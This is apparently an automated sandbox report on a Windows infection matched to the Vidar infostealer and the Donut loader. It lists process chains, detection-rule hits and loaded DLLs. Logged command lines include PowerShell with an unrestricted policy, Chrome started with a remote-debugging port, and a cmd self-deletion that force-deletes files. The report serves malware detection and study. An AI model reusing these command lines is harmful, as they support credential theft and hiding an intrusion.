Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03ADAAE2 4_2_03ADAAE2
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03AD8946 4_2_03AD8946
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EA000 4_2_038EA000
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03AD983A 4_2_03AD983A
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03AD9C0A 4_2_03AD9C0A
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03ADA042 4_2_03ADA042
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03EEE928 4_2_03EEE928
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03EEA5C8 4_2_03EEA5C8
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03EEA5C3 4_2_03EEA5C3
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_03EEAF50 4_2_03EEAF50
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0762A300 4_2_0762A300
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076227E3 4_2_076227E3
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076227F0 4_2_076227F0
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0762A2F0 4_2_0762A2F0
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0765D5B0 4_2_0765D5B0
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07697638 4_2_07697638
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07692170 4_2_07692170
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0769776B 4_2_0769776B
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07691506 4_2_07691506
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07691510 4_2_07691510
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07697DA4 4_2_07697DA4
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076A0040 4_2_076A0040
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_076A0006 4_2_076A0006
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0795F548 4_2_0795F548
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0795F840 4_2_0795F840
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0795DF80 4_2_0795DF80
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_0795E4B0 4_2_0795E4B0
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07940014 4_2_07940014
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07940006 4_2_07940006
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_07940040 4_2_07940040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00404B3F 8_2_00404B3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00414F57 8_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00417B66 8_2_00417B66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040AF7E 8_2_0040AF7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00416FF1 8_2_00416FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004151BF 8_2_004151BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040D84A appears 139 times
Source: s4xltbnq.rm5.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: s4xltbnq.rm5.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.s4xltbnq.rm5.exe.51df770.1.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.s4xltbnq.rm5.exe.38ec502.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 4.2.s4xltbnq.rm5.exe.38ec502.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2246764938.00000000038EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000008.00000002.2648805770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 4.2.s4xltbnq.rm5.exe.77b0000.11.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: powershell.exe, 00000000.00000002.1932226381.0000023DEF539000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEE011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEFFCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1932226381.0000023DEEAA5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shared.Struct.....??[...:TSetupHeader.:4.........??[..slYes.slNo.slAuto
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winPS1@32/38@9/10
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Code function: 4_2_038EAB95 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle, 4_2_038EAB95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LOHH41KC.htm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvtihnzu.et2.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: s4xltbnq.rm5.exe, 00000004.00000002.2246764938.00000000038EA000.00000040.00000020.00020000.00000000.sdmp, s4xltbnq.rm5.exe, 00000004.00000002.2318029156.00000000068D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: update [{0}] set data = @data, revision = @next_revision where id = @id and revision = @current_revisionMdelete from [{0}] where saga_id = @id;
Source: s4xltbnq.rm5.exe String found in binary or memory: rebus-return-address
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\runner.txt.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES238E.tmp" "c:\Users\user\AppData\Local\Temp\pgu3x4ye\CSCD87E146550AE4A5F825126D37CD9244E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe "C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe"
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2300,i,13629319802910030206,589227573131625010,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\vs00z" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgu3x4ye\pgu3x4ye.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe "C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES238E.tmp" "c:\Users\user\AppData\Local\Temp\pgu3x4ye\CSCD87E146550AE4A5F825126D37CD9244E.TMP" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\vs00z" & exit Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2300,i,13629319802910030206,589227573131625010,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\s4xltbnq.rm5.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
